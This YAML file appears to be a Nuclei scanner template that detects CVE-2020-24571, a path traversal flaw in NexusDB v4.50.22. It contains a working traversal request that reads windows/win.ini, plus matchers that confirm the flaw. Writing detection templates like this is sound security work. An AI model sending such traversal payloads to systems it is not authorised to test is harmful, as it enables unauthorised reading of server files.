24 lines
492 B
YAML
24 lines
492 B
YAML
id: CVE-2020-24571
|
|
info:
|
|
name: NexusDB v4.50.22 Path Traversal
|
|
author: pikpikcu
|
|
severity: high
|
|
reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
|
|
tags: cve,cve2020,nexusdb,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/../../../../../../../../windows/win.ini'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "[extensions]"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|